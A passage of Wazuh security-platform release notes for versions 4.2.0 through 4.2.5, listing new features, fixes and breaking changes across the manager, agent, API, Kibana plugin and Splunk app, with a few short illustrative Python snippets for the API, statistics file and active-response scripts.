This section lists the changes in version 4.2.5. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

What's new

This release includes new features or enhancements.

Manager
  • #10809 Active response requests for agents between versions 4.2.0 and 4.2.4 are now sanitized to prevent unauthorized code execution.

Wazuh Kibana plugin
  • Wazuh Kibana plugin is now compatible with Wazuh 4.2.5.

  • Support for Kibana 7.13.4.

  • Support for Kibana 7.14.2.

Wazuh Splunk app
  • Wazuh Splunk app is now compatible with Wazuh 4.2.5.

Resolved issues

This release resolves known issues.

Agent

Reference

Description

#10809

A bug in the Active Response tools that might allow unauthorized code execution has been mitigated.

Wazuh Kibana plugin

Reference

Description

#3653

A compatibility issue between Wazuh 4.2 and Kibana 7.13.4 is now fixed. In addition, this fix is compatible with Kibana 7.10.

#3654

This fix resolves an error that caused the interactive screen of a new agent to break when selecting the Windows OS option. This fix is compatible with Kibana 7.10.

#3668

A style compatibility issue of the breadcrumb navigation inside Kibana 7.14.2 is now fixed.

#3670

This fix resolves the Wazuh API token not being deprecated after logout with Kibana 7.13 and 7.14.

#3672

A Group Configuration and Management Configuration error is now fixed when the user tries to go back after saving.

#3674

With this fix, the panels and their titles are correctly displayed in the Welcome Overview and the Management Directory. In addition, all the Wazuh menus are now consistent, without titles in gray.

#3676

An issue with double flyout appearing when clicking a policy is now fixed.

#3678

Kibana settings conflict in health check is now fixed.

#3681

Compatibility to get the valid index patterns and refresh fields for Kibana 7.10.2-7.13.4 is now fixed.

Changelogs

More details about these changes are provided in the changelog of each component:

4.2.4 Release notes - 20 October 2021

This section lists the changes in version 4.2.4. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

What's new

This release includes new features or enhancements.

Wazuh Kibana plugin
  • Wazuh Kibana plugin is now compatible with Wazuh 4.2.4.

Wazuh Splunk app
  • Wazuh Splunk app is now compatible with Wazuh 4.2.4.

Resolved issues

This release resolves known issues.

Manager

Reference

Description

#9158

This fix prevents files belonging to deleted agents from remaining in the manager.

#10432

Fixed inaccurate agent group file cleanup in the database sync module. Now, the module syncs up the agent database from client.keys before cleaning up the groups folder.

#10479

This fix prevents the manager from corrupting the agent data integrity when the disk gets full.

#10559

A resource leak in Vulnerability Detector when scanning Windows agents is now fixed.

Wazuh Kibana plugin

Reference

Description

#3638

An issue that caused the user's auth token not to be deprecated correctly after logging out of the API is now fixed.

Changelogs

More details about these changes are provided in the changelog of each component:

4.2.3 Release notes - 6 October 2021

This section lists the changes in version 4.2.3. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

What's new

This release includes new features or enhancements.

Wazuh Kibana plugin
  • Wazuh Kibana plugin is now compatible with Wazuh 4.2.3.

Wazuh Splunk app
  • Wazuh Splunk app is now compatible with Wazuh 4.2.3.

Resolved issues

This release resolves known issues.

Manager

Reference

Description

#10388

An issue in Remoted that might lead it to crash when retrieving an agent's group is now fixed.

Changelogs

More details about these changes are provided in the changelog of each component:

4.2.2 Release notes - 28 September 2021

This section lists the changes in version 4.2.2. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

Highlights

This release includes highlighted features and enhancements.

Manager
  • #9779 Authd now refuses enrollment attempts if the agent already holds a valid key. With this added feature, Authd can only generate new keys if the agent key does not exist on the manager side. Based on this, the manager has the capability to decide if a new key should be generated or not. Since the introduction of Enrollment in version 4.0.0, Wazuh provides the user with an automated mechanism to enroll agents with minimal configuration. This registration method might cause agents to self-register under certain circumstances, even if they were already registered. This improvement prevents this issue from happening and avoids re-registering agents that already have valid keys.

Agent
  • #9927 The Google Cloud Pub/Sub integration module is updated to increase processed events per second. The rework of this integration module allows multithreading, increases performance significantly, and adds a new num_threads option to the module configuration. The new multithreading feature allows pulling messages with multiple subscribers simultaneously, improving the performance drastically. In addition, this new Google Cloud integration includes some improvements in the pulling and acknowledging mechanism, and the socket connection as well.

Wazuh Kibana plugin
  • #3175 Wazuh improves the API selector and Index pattern selector of the Wazuh Kibana plugin, moving both from the main menu to the upper right corner of the header bar for quick access. This new UX improvement allows users to have better management of these two features. As for visualization, the API selector is displayed when there is more than one to select. The Index pattern selector is displayed under the same conditions and only contains index patterns that have Wazuh alerts.

  • #3503 Wazuh adds a new functionality that allows users to change the logotype settings of the Wazuh Kibana plugin. From the Logo Customization section of the Configuration page, users can customize the logos of the app easily and to their liking. Setting options include customization of Logo App, Logo Sidebar, Logo Health Check, and Logo Reports.

Logo customization settings
Wazuh Splunk app
  • #1107 Wazuh adds Quick Settings to improve the view and selection of the Wazuh API, Index, and Source type of the Wazuh Splunk app. Now users can change the configuration of these elements easily from this new menu in the app.

Quick settings menu
What's new

This release includes new features or enhancements.

Manager
  • #9133 The agent's inventory data on the manager is correctly cleaned up when Syscollector is disabled.

  • #9779 Authd now correctly refuses enrollment attempts if the agent already holds a valid key.

Agent
  • #9907 Syscollector scan performance is optimized.

  • #9927 The Google Cloud Pub/Sub integration module rework increases the number of processed events per second allowing multithreading and enhancing performance. Also, a new num_threads option is added to the module configuration.

  • #9964 google-cloud-pubsub dependency is now upgraded to the latest stable version (2.7.1).

  • #9443 The WPK installer rollback is reimplemented on Linux.

  • #10217 Updated AWS WAF implementation to change httpRequest.headers field format.

RESTful API
  • #10219 Made SSL ciphers configurable and renamed SSL protocol option.

Wazuh Kibana plugin
  • #3170 Wazuh support links are added to the Kibana help menu. You now get quick access to the Wazuh Documentation, Slack channel, Projects on GitHub, and Google Group.

  • #3184 You now can access group details directly by using the group query parameter in the URL.

  • #3222 #3292 A new configuration is added to disable Wazuh App access from X-Pack/ODFE role.

  • #3221 New confirmation message is now displayed when closing a form.

  • #3503 Wazuh introduces a new Logo Customization section that allows you to change and customize app logotypes.

  • #3592 The link to the Wazuh Upgrade guide is now included in the message shown when the Wazuh API version and the Wazuh App version mismatch.

  • #3160 To improve user experience, module titles are now removed from the dashboards.

  • #3174 The default wazuh.monitoring.creation app setting is changed from d to w.

  • #3174 The default wazuh.monitoring.shards app setting is changed from 2 to 1.

  • #3189 SHA1 field is removed from the Windows Registry details pane.

  • #3250 Removed tooltip from header breadcrumb to improve readability.

  • #3197 Refactoring of the Health check component improves user experience.

  • #3210 When deploying a new agent, the Install and enroll the agent command now specifies the version in the package downloaded name.

  • #3243 In the vulnerabilities Inventory, the restriction that only allowed current active agents’ information to be shown is removed. Now, it displays the vulnerabilities table regardless of whether the agent is connected or not.

  • #3175 To improve user experience of the Wazuh Kibana API, the Index pattern selector and API selector are moved to the header bar.

  • #3258 Health check actions' notifications are refactored and the process can now be run in debug mode.

  • #3349 Changed the way kibana-vis hides the visualization while loading. This improvement prevents errors caused by having a 0 height visualization.

Wazuh Splunk app
  • #1083 Added MITRE ATT&CK framework integration.

  • #1076 Added MITRE ATT&CK dashboard integration.

  • #1109 Wazuh now gives you enhanced insight into the CVE that are affecting an agent. The newly added Inventory dashboard in the Vulnerabilities module allows you to visualize information such as name, version, and package architecture, as well as the CVE ID that affects the package.

  • #1104 New Source type selector is now added to customize queries used by dashboards.

  • #1107 The Wazuh Splunk app now includes a Quick settings menu to improve user experience. This enhancement allows you to quickly view and select the Wazuh API, Index, and Source type.

  • #1118 jQuery version is upgraded from 2.1.0 to 3.5.0.

  • Wazuh supports Splunk 8.1.4.

  • Wazuh supports Splunk 8.2.2.

Resolved issues

This release resolves known issues.

Manager

Reference

Description

#9647

A false positive in Vulnerability Detector is no longer generated when packages have multiple conditions in the OVAL feed.

#9042

This fix prevents pending agents from keeping their state indefinitely in the manager.

#9088

An issue in Remoted is fixed. Now, it checks the group an agent belongs to when it receives the keep-alive message and avoids agents in connected state with no group assignation.

#9278

An issue in Analysisd that caused the value of the rule option noalert to be ignored is now fixed.

#9378

Fixed Authd's startup to set up the PID file before loading keys.

#9295

An issue in Authd that delayed the agent timestamp update when removing agents is now fixed.

#9705

An error in Wazuh DB that held wrong agent timestamp data is now resolved.

#9942

An issue in Remoted that kept deleted shared files in the multi-groups' merged.mg file is now fixed.

#9987

An issue in Analysisd that overwrote its queue socket when launched in test mode is now resolved.

#10016

This fix prevents false positives when evaluating DU patches in the Windows Vulnerability Detector.

#10214

Memory leak is fixed when generating the Windows report in Vulnerability Detector.

#10194

A file descriptor leak is fixed in Analysisd when delivering an AR request to an agent.

Agent

Reference

Description

#9710

This fix prevents the manager from hashing the shared configuration too often.

#9310

Memory leak is fixed in Logcollector when re-subscribing to Windows EventChannel.

#9967

Memory leak is fixed in the agent when enrolling for the first time with no previous key.

#9934

CloudWatchLogs log stream limit, when there are more than 50 log streams, is now removed.

#9897

A problem in the Windows installer is fixed; the agent can now be successfully uninstalled or upgraded.

#9775

AWS WAF log parsing error is fixed and log parsing now works correctly when there are multiple dictionaries in one line.

#10024

An issue is fixed in the AWS CloudWatch Logs module that caused already processed logs to be collected and reprocessed.

#8256

This fix avoids duplicate alerts from case-insensitive 32-bit registry values in FIM configuration for Windows agents.

#10250

Error with Wazuh path in Azure module is now fixed.

#10210

An issue is fixed in the sources and WPK installer that made the upgrade unable to detect the previous installation on CentOS 7.

RESTful API

Reference

Description

#9984

An issue with distributed API calls when the cluster is disabled is now fixed.

Wazuh Kibana plugin

Reference

Description

#3159

Cluster visualization screen flickering is fixed.

#3161

Links now work correctly when using server.basePath Kibana setting.

#3173

In the Vulnerabilities module, a filter error is resolved and PDF reports are generated with complete Summary information.

#3234

Fixed typo error in the Configuration tab of the Settings page.

#3217

In the agent summary of the Agents data overview page, fields no longer overlap under certain circumstances and are correctly displayed.

#3257

An issue when using the Ruleset Test is now fixed. Now, all requests are made in the session unless you click Clear session.

#3237

Visualize button issue is resolved and the button is displayed when expanding a field in the Events tab sidebar.

#3244

Some modules were missing from the Agents data overview page. This issue is fixed and they are now successfully displayed.

#3260

With this fix, App log messages are improved and WUI error logs removed.

#3272

Some errors on PDF reports are fixed.

#3289

When deploying a new agent, selecting macOS as the operating system in a Safari browser no longer generates a TypeError.

#3297

An issue in the Security configuration assessment module is fixed. SCA checks are displayed correctly.

#3241

An issue with an error message when adding sample data fails is fixed.

#3303

An error in reports is fixed and now the Alerts Summary of modules is generated completely.

#3315

Fixed dark mode visualization background in PDF reports.

#3309

Kibana integrations are now adapted to Kibana 7.11 and 7.12.

#3306

An issue in the Agents overview window is fixed, and it is now rendered correctly.

#3326

Fixed an issue with miscalculation of table width in PDF reports. With this fix, tables are displayed correctly.

#3323

visData table property is normalized for 7.12 backward compatibility and Alerts Summary table is shown in PDF reports.

#3358

Export-to-CSV buttons in dashboard tables are now fixed.

#3345

Fixed Elastic UI breaking changes errors in 7.12.

#3347

Wazuh main menu and breadcrumb render issues are now fixed.

#3397

This fix prevents some errors from causing a massive increase in logs size.

#3593

Fixed an issue in the Vulnerabilities pane that did not show alerts if the vulnerability had a field missing.

#3240

This fix correctly hides the navbar Wazuh label.

#3355

Labels of some visualizations no longer overlap, improving readability.

Wazuh Splunk app

Reference

Description

#1070

Error when trying to pin filters is fixed.

#1074

An issue in tables without server-side pagination is fixed. This allows loading unlimited items, but only one page at a time, preserving client and server resources.

#1077

An issue with the gear icon mispositioned in FIM tables is now fixed.

#1078

Added cache control. With this fix, a message is displayed if the version of the Wazuh app in your browser does not correspond with the app version installed on Splunk.

#1084

Fixed error where tables unset their loading state before finishing API calls.

#1083

An issue with search bar queries containing spaces is fixed.

#1083

Fixed pinned fields ending with curly brackets.

#1099

Splunk Cloud compatibility issues are now fixed.

#1103

Agent node names are now correctly displayed in the agent overview.

#1103

Reports no longer have missing columns for some tables and are now displayed correctly.

#1112

Issue with expanding row feature in File Integrity Monitoring of agents is now fixed.

Changelogs

More details about these changes are provided in the changelog of each component:

4.2.1 Release notes - 3 September 2021

This section lists the changes in version 4.2.1. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

Wazuh core
Resolved issues

Installer

Reference

Description

#9973

An issue in the upgrade to 4.2.0 that disabled Eventchannel support on Windows agents is now fixed.

Modules

Reference

Description

#9975

An issue with Python-based integration modules causing the integrations to stop working in Wazuh v4.2.0 agents is now fixed.

Wazuh Kibana plugin
What's new
  • Wazuh Kibana plugin is now compatible with Wazuh 4.2.1.

Wazuh Splunk app
What's new
  • Wazuh Splunk app is now compatible with Wazuh 4.2.1.

Changelogs

More details about these changes are provided in the changelog of each component:

4.2.0 Release notes - 25 August 2021

This section lists the changes in version 4.2.0. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

Highlights

Core

  • #3368, #5652, #7109 Logcollector improvements:

    Logcollector is now enhanced with several new features. Wazuh adds Logcollector support for bookmarks, which allows you to continue reading a log file from the last read line where the agent stopped, improving efficiency and productivity. The multi-line log support through regex lets you collect multi-line logs with a variable number of lines. The agent also generates a statistics file report during the Logcollector lifetime. This means that, in addition to the alternative of accessing metrics via API queries, you now have the option to access this information from a file stored in an agent, according to a configurable time. A short sketch of reading this statistics file follows this list.

  • #7731 Visibility improvements on agent CVE inventory report:

    Wazuh now generates CVE inventory reports that give you insight into vulnerabilities that affect an agent. With this added feature, this information is now queried through the RESTful API and displayed on the user interface for analysis. This visibility improvement allows you to assess vulnerabilities affecting your monitored agents and take quick corrective action if needed.

  • #7541 Agent port support for TCP and UDP:

    Remoted now supports listening to TCP and UDP ports simultaneously. This new support of both protocols provides several enhanced features related to manager active check, agent connection and logging, active response, API requests, JSON formatting, and more. This new supportability also provides enhancements related to centralized configuration since now agents can be configured remotely by using the agent.conf file.

  • #6912 Wazuh unified standard improvements:

    The names of daemons and tools for the Wazuh product are now renamed and unified to achieve consistency and uniformity, according to the new Wazuh standards.

  • #7105, #7018, #7268, #8224, #7795 Stability enhancements on Wazuh features:

    Wazuh new fixes provide stability to several features of the solution, including Analysisd, File Integrity Monitoring, Remoted, and Vulnerability Detector. These changes improve user experience throughout the product.
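
As referenced in the Logcollector highlight above, the statistics file can be read directly on the agent. The sketch below is a minimal illustration of that; the file path and the JSON layout are assumptions based on a default Linux installation and may differ by version and platform.

```python
# Minimal sketch: reading the Logcollector statistics file on an agent.
# The path and JSON layout are assumptions for a default Linux installation;
# both may vary by version and platform.
import json
from pathlib import Path

STATE_FILE = Path("/var/ossec/var/run/wazuh-logcollector.state")  # assumed location

state = json.loads(STATE_FILE.read_text())

# Print one line per monitored file with the number of events read, assuming
# a "global"/"files" structure similar to the statistics exposed by the API.
for entry in state.get("global", {}).get("files", []):
    print(f'{entry.get("location")}: {entry.get("events", 0)} events')
```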

API

  • #7588 Endpoint for allow_run_as parameter configuration:

    The allow_run_as parameter is now removed from endpoints to create and update API users. Now, Wazuh adds a new endpoint to modify the user’s allow_run_as flag, allowing you to enable or disable the parameter after creating a user.

  • #7647 CVE data endpoint integration:

    Wazuh adds a new endpoint to get CVE data on affected agents. With this new endpoint, you can query the vulnerability data of any agent and get enhanced insight into the CVE, giving you easy access to data such as package name, package version, package architecture, and the CVE ID that affects said package.

  • #7200 Endpoint for Logcollector statistics:

    Wazuh adds a new endpoint to get statistics from different components such as Logcollector, allowing you to retrieve information from both managers and agents. With this enhancement, Wazuh components that generate statistics files expose this information through their own socket interface so that it can be fetched from a remote component. A usage sketch of this endpoint, together with the CVE data endpoint above, follows this list.

  • #6366 Improved DELETE /agents endpoint:

    The DELETE/agents query now integrates new parameters that allow you to customize selection, and to easily remove agents that belong to a group. With this improvement, the older_than field is also removed from the response.
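
To make the endpoints described above more concrete (#7647 and #7200), here is a minimal sketch that authenticates against the Wazuh API and queries an agent's vulnerability data and Logcollector statistics. The base URL, credentials, agent ID, and the exact vulnerability path are assumptions; consult the API reference for your version.

```python
# Minimal sketch: querying the new CVE and Logcollector statistics endpoints.
# Base URL, credentials, and agent ID are assumptions for a lab setup, and
# the vulnerability endpoint path may differ in your API version.
import requests

BASE = "https://localhost:55000"   # assumed Wazuh API address
AGENT = "001"                      # assumed agent ID

# Authenticate with basic auth and reuse the JWT token (depending on the
# API version this call may need to be a POST).
token = requests.get(f"{BASE}/security/user/authenticate",
                     auth=("wazuh", "wazuh"), verify=False).json()["data"]["token"]
headers = {"Authorization": f"Bearer {token}"}

# CVE inventory of the agent (#7647); the path is an assumption.
vulns = requests.get(f"{BASE}/vulnerability/{AGENT}",
                     headers=headers, verify=False).json()
for item in vulns["data"]["affected_items"]:
    print(item.get("cve"), item.get("name"), item.get("version"))

# Logcollector statistics of the same agent (#7200).
stats = requests.get(f"{BASE}/agents/{AGENT}/stats/logcollector",
                     headers=headers, verify=False).json()
print(stats["data"])
```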

Wazuh Kibana plugin

  • #1434 New Ruleset Test tool:

    Wazuh improves the user experience by adding a new Ruleset Test feature under the Tools section of the Wazuh Kibana plugin menu. This feature is also included as a tool in the action bar of both the Edit Rules and Edit Decoders sections, allowing you to keep the Ruleset Test window open while you navigate through the page to edit or create a ruleset file.

    The new Ruleset Test tool also integrates an input box for reading sample logs and an output box that allows you to visualize the test results. With this enhancement, you can now test sample logs directly on the Wazuh user interface and see how the ruleset reacts to specific log messages.

  • #1434 Tools menu improvements:

    The Dev Tools feature is renamed as API Console and it is now found, together with the new Ruleset Test feature, inside the new Tools section under the Wazuh Kibana plugin menu.

  • #3056 New Agent Stats section:

    Wazuh adds a new Stats section that improves the visibility you have over agents’ statistics. You can access this feature by clicking Stats in the action ribbon on the Agent data overview page. This improvement allows you to visualize information fetched by the new API endpoint /agents/{agent_id}/stats/logcollector in the Wazuh user interface.

  • #3069 Agent new vulnerability inventory:

    Wazuh now gives you enhanced insight into the CVE that are affecting an agent. The newly added Inventory tab in the Vulnerabilities module allows you to visualize information such as package name, package version, package architecture, and the CVE ID that affects the package, and more. You can also access the vulnerability data flyout to expand on the specifics of each vulnerability entry detailed in the Inventory.

Breaking changes
  • #7317 With its Active Response capability, Wazuh now sends information to the active response executables via stdin instead of in-line arguments. Any custom active response script developed for previous versions of Wazuh needs to be adapted to accept the event information. Previous default scripts present in the active-response/bin directories are now replaced as part of the agent upgrade process. The Wazuh manager continues to send in-line arguments to Wazuh agents up to version 4.1.5. This improvement also includes new rules to match the new active response logs.
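
As a practical illustration of this breaking change, a custom active response script now reads a single JSON message from standard input instead of positional arguments. The skeleton below is a minimal sketch of that pattern; the exact field names (command, parameters, alert) should be validated against the active response documentation for your version, and the log path is purely illustrative.

```python
#!/usr/bin/env python3
# Minimal sketch of a custom active response script for Wazuh 4.2 or later:
# the event arrives as one JSON message on stdin instead of in-line
# arguments. The field names used here are assumptions to verify against
# the active response documentation for your version.
import json
import sys


def main():
    message = json.loads(sys.stdin.read())                   # full AR message
    command = message.get("command", "")                     # e.g. "add" or "delete"
    alert = message.get("parameters", {}).get("alert", {})   # full alert object

    # Illustrative action: append a line to a local log file (assumed path).
    with open("/tmp/custom-ar.log", "a") as log:
        log.write(f"{command}: rule {alert.get('rule', {}).get('id')}\n")


if __name__ == "__main__":
    main()
```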

Wazuh core
What's new

This release includes new features or enhancements.

Cluster

  • #8175 Improvements in cluster node integrity calculation make the process more efficient. Now, it calculates the MD5 of only the files that were modified since the last integrity check.

  • #8182 The synchronization workflow of agent information between cluster nodes is optimized and now the synchronization is performed in a single task for each worker.

  • #8002 Cluster logs are now changed to show more useful and essential information, improving clarity and readability.

Core

  • #3368 Wazuh adds support for bookmarks in Logcollector. This allows you to follow the log file from the last read line where the agent stopped.

  • #5652 Wazuh collects multi-line logs with a variable number of lines in Logcollector. This improved support is especially useful when dealing with logs, such as Java Stack Trace, since the number of lines in the log no longer needs to be held constant for every event type.

  • #6830 A new option is added that lets you limit the maximum number of files read per second during the File Integrity Monitoring (FIM) scan. This gives you more control over FIM by letting you limit the amount of data analyzed during a scheduled scan.

  • #7109 Wazuh adds statistics file to Logcollector. In addition to the alternative of accessing metrics via API queries, you now have the option to access this information from a file stored in an agent, according to a configurable time. This data is generated and updated every logcollector.state_interval seconds and can be accessed at any moment.

  • #7239 Wazuh provides enhanced state information by adding statistical data queries to the agent.

  • #7307 Quoting in commands to group arguments is now allowed in the command wodle and SCA checks. Before this enhancement, the system parsed quoted substrings into the same argument but kept the double-quotes. Now, escapes and double-quotes are allowed in command lines so that you can handle arguments in command calls.

  • #7408 Agent IP address detection capabilities are improved and agents running on Solaris now send their IP address to the manager.

  • #7444 A new ip_update_interval option is added to set how often the agent refreshes its IP address.

  • #7661 New support is added for testing location information in Wazuh logtest.

  • #7731 Vulnerability Detection capabilities are now improved by adding new Vulnerability Detector reports to the Wazuh database so you can know which CVE affect an agent.

  • #8755 A newly added option allows you to enable or disable listening on the Authd TLS port.

  • #6912 Wazuh daemons are now renamed to follow the Wazuh unified standard.

  • #6903 Wazuh CLIs and related tools are now renamed to follow Wazuh unified standard.

  • #6920 Wazuh internal directories are now renamed to follow Wazuh unified standard.

  • #6759 Wazuh improvement prevents a condition in FIM from possibly causing a memory error.

  • #6828 FIM now switches from who-data to real-time mode when Audit is in immutable mode.

  • #7317 Active Response protocol changed to receive messages in JSON format that include the full alert.

  • #7264 References in logs are now changed to include Wazuh product name.

  • #7541 Remoted now supports both TCP and UDP protocols simultaneously.

  • #7595 Unit tests for the os_net library are now improved in functionality and consistency.

  • #6999 FIM now removes the Audit rules when their corresponding symbolic links change their target.

  • #7797 Compilation from sources now downloads the prebuilt external dependencies. This improvement helps to consume fewer resources and eliminates overhead.

  • #7807 The old implementation of logtest is restored and renamed as wazuh-logtest-legacy, improving functionality.

  • #7974 Wazuh adds performance improvements to Analysisd when running on multi-core hosts.

  • #8021 Agents now notify the manager that they are stopping. This allows the manager to log an alert and immediately set their state to "disconnected".

  • #7327 Wazuh building process is now independent of the installation directory. With this improvement, the embedded Python interpreter is now provided in a preinstalled, portable package, and the Wazuh resources are now accessed via a relative path to the installation directory.

  • #8201 In the Security configuration assessment module, the error log message shown when the agent cannot connect to the SCA queue is now changed to a warning message to redefine its severity.

  • #8921 The agent now validates the Audit connection configuration when enabling who-data for FIM on Linux.

  • #7175 The /etc/ossec-init.conf file no longer exists.

  • #7398 Unused files are removed from the repository, including TAP tests.

  • #7379 Syscollector now synchronizes its database with the manager, avoiding full data delivery on each scan.

API

  • #7200 Wazuh adds a new endpoint to get agent statistics from different components.

  • #7588 Wazuh adds a new endpoint to modify the user’s allow_run_as flag, allowing you to enable or disable the parameter.

  • #7647 Wazuh adds a new endpoint to get CVE data on affected agents. You can now query the vulnerability data of any agent.

  • #7803 A new API configuration validator is now added to improve validation checking processes.

  • #8115 Wazuh adds the capability that allows you to disable the max_request_per_minute API configuration option by setting its value to 0.

  • #6904 Ruleset versions for GET /cluster/{node_id}/info and GET /manager/info are deprecated and removed.

  • #6909 The POST /groups endpoint is now changed to specify the group name in a JSON body instead of a query parameter (see the sketch after this list).

  • #7312 PUT /active-response endpoint function is now changed to create messages with new JSON format.

  • #6366 The DELETE/agents query now integrates new parameters that allow you to easily remove agents that belong to a group. With this improvement, the older_than field is also removed from the response.

  • #7909 Login security controller is improved to avoid errors in Restful API reference links.

  • #8123 The PUT /agents/group/{group_id}/restart response format is now improved when there are no agents assigned to the group.

  • #8149 Agent keys used when adding agents through the Wazuh API are now obscured in the API log.

  • #8457 The agent-restart functionality of all endpoints is now improved by removing the active-response check.

  • #8615 The performance of API request processing time is optimized by applying cache to token RBAC permissions extraction. Now, this process is invalidated if any resource related to the token is modified.

  • #8841 The default value of the limit API parameter remains 500, but you can now specify values up to a maximum of 100000.

  • #7588 The allow_run_as parameter is now removed from endpoints to create and update API users.

  • #7006 The behind_proxy_server option is now removed from configuration.
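
As a concrete illustration of the POST /groups and DELETE /agents changes listed above (#6909 and #6366), the sketch below creates a group by sending its name in a JSON body and then removes the agents assigned to it. The base URL, credentials, group name, body field, and query parameter names are assumptions to be checked against the API reference for your version.

```python
# Minimal sketch: creating a group via a JSON body and removing its agents.
# Base URL, credentials, group name, and parameter names are assumptions;
# check them against the API reference for your version.
import requests

BASE = "https://localhost:55000"   # assumed Wazuh API address

# Token obtained as in the earlier sketches.
token = requests.get(f"{BASE}/security/user/authenticate",
                     auth=("wazuh", "wazuh"), verify=False).json()["data"]["token"]
headers = {"Authorization": f"Bearer {token}"}

# POST /groups now takes the group name in a JSON body (#6909); the body
# field name is an assumption.
requests.post(f"{BASE}/groups", headers=headers,
              json={"group_id": "web-servers"}, verify=False)

# DELETE /agents can target the agents of a group directly (#6366); the
# query parameter names are assumptions.
requests.delete(f"{BASE}/agents", headers=headers,
                params={"group": "web-servers", "agents_list": "all",
                        "status": "all"}, verify=False)
```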

Framework

  • #8682 This enhancement improves the agent insertion algorithm when Authd is not available.

  • #6904 update_ruleset script is now deprecated and removed.

Ruleset

  • #7100 Wazuh now provides decoder support for UFW (Uncomplicated Firewall) and its log format. This improvement ensures the correct processing of Ubuntu default firewall logs.

  • #6867 The ruleset is updated and normalized to follow the Wazuh unified standard.

  • #7316 CIS policy "Ensure XD/NX support is enabled" is restored for SCA.

External dependencies

  • #8886 Boto3, botocore, requests, s3transfer, and urllib3 Python dependencies are now upgraded to their latest stable versions.

  • #9389 Python is now updated to the latest stable version 3.9.6.

  • GCP dependencies and pip are now upgraded to their latest stable versions.

  • python-jose is upgraded to version 3.1.0.

  • Wazuh now adds tabulate dependency.

Resolved issues

This release resolves known issues.

Cluster

Reference

Description

#6736

Memory usage is now optimized and improved when creating cluster messages.

#8142

Error when unpacking incomplete headers in cluster messages is now fixed. Now cluster communication works correctly and the process is completed successfully.

#8499

When iterating over a listed file that has already been deleted, the error message is now changed and shown as a debug message.

#8901

An issue with cluster timeout exceptions is now fixed.

#8872

An issue with KeyError that occurred when an error command is received in any cluster node is now fixed.

Core

Reference

Description

#6934

In FIM, setting scan_time to 12am or 12pm now works correctly.

#6802

In FIM, reaching the file limit no longer creates wrong alerts for events triggered in a monitored folder. Now, a new SQLite query fetches the information of all the files in a specific order.

#7105

The issue in Analysisd where the static decoder field name command was reserved but not evaluated is resolved. From now on, it is always treated as a dynamic decoder field.

#7073

The evaluation of fields in the description tag of roles now works correctly.

#6789

In FIM, errors that caused symbolic links not to work correctly are now fixed.

#7018

Path validation in FIM configuration is now fixed. Now, the process to validate and format a path from configuration is performed correctly.

#7018

The issue with ignore option in FIM where relative paths are not resolved is now fixed.

#7268

The issue in FIM that wrongly detected that the file limit was reached is now fixed and nodes_count database variable is checked correctly.

#7265

Alerts are now successfully generated in FIM when a domain user deletes a file.

#7359

Windows agent compilation with GCC 10 is now performed successfully.

#7332

Errors in FIM when expanding environment variables are now fixed.

#7476

Rule descriptions are now included in archives when the input event matches a rule, regardless of whether an alert was triggered or not.

#7495

The regex parser is fixed and it now accepts empty strings.

#7414

In FIM, an issue with delete events with real-time is now fixed. Now, deleted files in agents running on Solaris generate alerts and are correctly reported.

#7633

In Remoted, the priority header is no longer included incorrectly in Syslog when using TCP.

#7782

A stack overflow issue in the XML parsing is now fixed by limiting the levels of recursion to 1024.

#7795

Vulnerability Detector now correctly skips scanning all the agents in the master node that are connected to another worker.

#7858

Wazuh database synchronization module now correctly cleans dangling agent group files.

#7919

In Analysisd, a regex parser issue with memory leaks is now fixed.

#7905

A typo is fixed in the initial value for the hotfix scan ID in the agents' DB schema.

#8003

A segmentation fault issue is fixed in Vulnerability Detector when parsing an unsupported package version format.

#7990

In FIM, false positives were triggered due to file inode collisions in the engine DB. This issue is now fixed and FIM works properly when the inode of multiple files is changed.

#6932

An issue with error handling when wildcarded RHEL feeds are not found is now fixed.

#7862

The equals comparator is fixed for OVAL feeds in Vulnerability Detector. Now, equal versions in the OVAL scan are successfully compared.

#8098 #8143

In FIM, an issue that caused a Windows agent to crash when synchronizing a Windows Registry value that starts with a colon (:) is now resolved. The Windows agent no longer crashes during the synchronization of registries.

#8151

A starving hazard issue in the Wazuh DB is fixed and there are no longer risks of incoming requests being stalled during database commitment.

#8224

An issue with race condition in Remoted that, under certain circumstances, crashes when closing RID files is now fixed. Remoted now locks the KeyStore in writing mode when closing RIDs.

#8789

This fix resolves a descriptor leak issue in the agent when it failed to connect to Authd.

#8828

An issue related to a potential error caused by a delay in the creation of Analysisd PID file when starting the manager is now fixed.

#8551

An invalid memory access hazard issue in Vulnerability Detector is fixed.

#8571

When the agent reports a file with an empty ACE list, it no longer causes an error at the manager in the FIM decoder.

#8620

This fix prevents the agent on macOS from getting corrupted after an operating system upgrade.

#8357

An error in the manager that prevented its configuration from being checked after a change made through the API when Active Response is disabled is now fixed.

#8630

When removing an agent, the manager now correctly removes remote counters and agent group files.

#8905

This fix in the agent on Windows resolves the issue that might cause the FIM DB to be corrupted when disabling the disk sync.

#9364

Logcollector on Windows no longer crashes when handling the position of the file.

#9285

In Remoted, a buffer underflow hazard when handling input messages is now fixed.

#9547

In the agent, an issue that tried to verify the WPK CA certificate even when verification was disabled is now fixed.

API

Reference

Description

#7587

API messages for agent upgrade results are fixed and improved.

#7709

An issue with wrong user strings in API logs is fixed when receiving responses with status codes 308 or 404.

#7867

A newly added variable fixes API errors when the cluster is disabled and node_type is worker.

#7798

API integration test mapping script is now updated, fixing redundant paths and duplicated tests.

#8014

API integration test case test_rbac_white_all no longer fails and a new test case for the enable/disable run_as endpoint is added for improved consistency.

#8148

An issue related to thread race condition when adding or deleting agents without authd is now fixed.

#8496

CORS (cross-origin resource sharing) is now fixed in API configuration, allowing lists to be added to expose_headers and allow_headers.

#8887

An issue related to api.log is fixed to avoid unhandled exceptions on API timeouts.

Ruleset

Reference

Description

#7837

usb-storage-attached regex pattern is now improved to support blank spaces.

#7645

SCA checks for RHEL 7 and CentOS 7 are now fixed.

#8111

Match criteria for AWS WAF rules are now fixed and improved.

Wazuh Kibana plugin
What's new

This release includes new features or enhancements.

  • #1434 A new Ruleset Test tool is added under the Tools menu and in the action bar of the Edit Rules and Edit Decoders sections. You can now test sample logs directly on the Wazuh user interface and see how the ruleset reacts to specific log messages.

  • #1434 Dev Tools feature is now moved under the new Tools menu and it is renamed as API Console.

